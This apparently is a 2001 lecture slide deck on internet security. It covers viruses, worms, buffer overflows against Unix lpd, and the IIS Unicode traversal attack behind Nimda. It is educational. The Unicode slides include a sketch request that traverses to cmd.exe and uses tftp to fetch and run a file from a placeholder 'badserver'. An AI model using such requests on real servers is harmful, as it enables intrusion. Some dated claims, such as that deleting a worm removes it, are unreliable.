Security on the Internet Norman White ©2001

Security What is it? Confidentiality – Can my information be stolen? Integrity – Can it be changed? Availability – Wil my information always be available.

Confidentiality How do I keep my data protected from prying eyes. Physical protection Protect systems, backup tapes, networks etc. Hard to protect all possible attacks Encryption – keep my data in a form that only I understand Hard to distribute, process data Still not immune to decryption Need both Physical and encryption

Integrity What do we do if someone just wants to destroy our data? Hackers, competitors etc. BACKUPS – Need sophisticated backup policies Vigilance – Need to keep track of security updates, Procedures – Need to have policies and procedures in place that deter security vilations

Availability What can I do about Denial of Service (DoS) attacks? Need network infrastructure protection Routers that reject typical Dos attacks Distributed servers on different networks that can take over for each other What about virus attacks?

Client security What are common ways to infect client workstations?

Some Viruses… Boot sector viruses Boot sector viruses infect the boot sector or partition table of a disk. Computer systems are most likely to be attacked by boot sector viruses when you boot the system with an infected disk from the floppy drive - the boot attempt does not have to be successful for the virus to infect the hard drive. Also, there are a few viruses that can infect the boot sector from executable programs- these are known as multi-partite viruses and they are relatively rare. Once the system is infected, the boot sector virus will attempt to infect every disk that is accessed by that computer. In general, boot sector viruses can be successfully removed.

Active X Viruses ActiveX malicious code ActiveX controls allow Web developers to create interactive, dynamic Web pages with broader functionality. An ActiveX control is a component object embedded in a Web page which runs automatically when the page is viewed. In many cases, the Web browser can be configured so that these ActiveX controls do not execute by changing the browser's security settings to "high." However, hackers, virus writers, and others who wish to cause mischief or worse may use ActiveX malicious code as a vehicle to attack the system. To remove malicious ActiveX controls, you just need to delete them.

Macro Viruses Macro viruses are viruses that use another application's macro programming language to distribute themselves. They infect documents such as MS Word or MS Excel. Unlike other viruses, macro viruses do not infect programs or boot sectors - although a few do drop programs on the user's hard drive. The dropped files may infect executable programs or boot sectors.

Script viruses (VBScript, JavaScript, HTML) Script viruses are written in script programming languages, such as VBScript and JavaScript. VBScript (Visual Basic Script) and JavaScript viruses make use of Microsoft's Windows Scripting Host to activate themselves and infect other files. Since Windows Scripting Host is available on Windows 98 and Windows 2000, the viruses can be activated simply by double-clicking the *.vbs or *.js file from Windows Explorer. HTML viruses use the scripts embedded in HTML files to do their damage. These embedded scripts automatically execute the moment the HTML page is viewed from a script-enabled browser.

Worm A computer worm is a self-contained program (or set of programs) that is able to spread functional copies of itself or its segments to other computer systems. The propagation usually takes place via network connections or attachments. To get rid of a worm you just need to delete the program.

How are servers infected Overflow techniques Infecting program sends a request that is too large for server too handle, usually where some parameter that a server program expects is designed to actually break the program in a way that the infecting program gets control. Executing known programs to get command control

Overflow examples Unix lpd Send unix server a lpd (line printer daemon) request that is too long. Parameters overflow lpd buffer into the code. Lpd is running as root, so hacker worm gains root control of machine. Worm program then initiates a file transfer of the rest of the program. Then starts scanning for other machines to break-in to.

Overflow technigues Virtually any remotely executed capability can be broken into this way if the code does not check for parameter valid lengths

Unicode Problems Basic technique Send web server a request to run GET..\..\cmd.exe tftp badfile badserver hackedserver Then issue a command GET badfile.exe parameters… Voila, hacker just broke in and dropped badfile on hacked system, then ran it. Solution don’t allow “\” character in command string

Unicode 2 SO.. Hacker now sends command GET..%2f..%2fcmd. Exe tftp etc %2f is the UNICODE representation of \ Windows doesn’t see the \, but later expands the %2f to a backslash before it execute command. So hackers then changed to the unicode representation of %2f Solution.. Check after expansion, not before.

Filesharing Problems Open network files shares allow hacker to drop infected files on user system waiting for them to be executed.

Example NIMDA Did all of above Used Unicode to break-in Used of scripts to break in Infected all open files shares Used previous trojan horse vulnerabilities

Management Takeaway Security is very important Assume you will be broken into, have a plan Monitor attacks constantly Keep systems up to date Configure firewalls etc. to control traffic Partition off external systems Watch out for users accessing from home, extends vulnerability.